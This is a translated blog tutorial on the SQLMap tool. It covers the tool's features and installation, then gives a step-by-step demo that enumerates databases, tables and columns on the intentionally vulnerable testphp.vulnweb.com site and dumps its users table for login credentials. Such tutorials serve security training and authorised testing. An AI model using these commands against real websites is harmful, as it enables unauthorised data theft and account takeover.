Using SQLMap to exploit SQL Injection (SQLi) vulnerabilities

Tram Ho

Before going into SQLMap, you should understand the concept of SQL Injection vulnerability. Previously, I had an article to introduce the basics of this type of attack here. Today’s article will mention simple features, installation and demo with SQLMap tool.

What is SQLMap

  • SQLMAP is a tool to exploit SQL database vulnerabilities. This tool is considered to be the best SQL exploitation tool available today. Used by security and hacker circles regularly. For users of Potassium or Back Track 5, SQLMAP is already integrated into the operating system. Particularly for Windows, we must install more python and SQLMAP to use
  • This is an open source tool, automating the process of discovering and exploiting SQL vulnerabilities. It comes with a powerful detection tool, many features suitable for the ultimate penetration tester

Feature

  • Fully support working with database management systems MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, …
  • Full support for SQL Injection attack techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band
  • Connect directly to the database without via SQL SQL, by providing DBMS login information, IP address, port and database name.
  • List users, password hashes, privileges, roles, databases, tables and columns.
  • Automatically identify password hashing formats and support cracking them using a dictionary-based attack.
  • Completely extract database tables, a series of specific items or columns of a user’s choice
  • Search for specific database names, specific tables on all databases, or specific columns on all database tables
  • Download and upload any file from the database server below the file system when the database software is MySQL, PostgreQuery or Microsoft SQL Server.
  • Perform arbitrary commands and access their standard output on the database server below the operating system when the database software is MySQL, PostgreQuery or Microsoft SQL Server

How to install

window

Step 1: Download the Python and SQLMap installation files
Python installation link: https://www.python.org/ftp/python/2….hon-2.7.10.msi
SQLMap installation link: https://github.com/sqlmapproject/sqlmap/zipball/master

Step 2: Install Python Open the file python-2.7.10.msi and select “install for all users” then click Next

Select the installation location (default is C: Python27)

Wait for the installation program and Click Finish to finish

* Step 3: Extract the downloaded sqlmap file and then copy the whole sqlmap directory to the path C: Python27 *

Open cmd and navigate to the directory just saved SQLMap

All completed, it is now possible to use sqlmap

Kali Linux

  • SQLMap is already installed in Kali
  • To use, go to Applications -> Exploitation Tool -> SQLMap or at Terminal type sqlmap

The basic commands

Demo

In this demo, we will try to find a way to get login information on the Web site: http://testphp.vulnweb.com/ (This is a demo Web site so you can try it out for yourself)

Step 1: Open the teminal and type the following command:
sqlmap –u ” http://testphp.vulnweb.com/search.php?test=query” u: is the url of the target: SQLMap will detect the target’s flaw and give information about the flaw.

Step 2: Once the target website is identified as having SQL injection vulnerabilities, we need to find the database name
python sqlmap.py –u “ http://testphp.vulnweb.com/search.php?test=query” –dbs dbs is the option to list the website’s databases

Step 3: After determining the database name, we will find the names of the tables in the database
sqlmap -u ” http://testphp.vulnweb.com/search.php?test=query ” –tables -D acuart Option – tables to list all the tables in the Option -D database as the base name The database needs to list the table The above statement is to list the tables in the acuart database

Step 4: Define the names of the columns in the table
We see the table user can contain login information, so we use the following command to determine the name of the columns in the user table sqlmap -u ” http://testphp.vulnweb.com/search.php?test=query ” – columns -D acuart -T users Option -columns to list columns in Option -D table name csdl Option -T table name to list columns Statement lists fields of user table in csdl acuart

In the users version, there are uname and pass fields with the possibility of having an account name and password to log into the system

Step 5: Get the data in the table
sqlmap -u ” http://testphp.vulnweb.com/search.php?test=query ” –dump -D acuart -T users The above command to retrieve the records of the users table

Table users have 1 record containing username and password information “test”, “test” Using this account, we will log into the system

Share the news now

Source : Viblo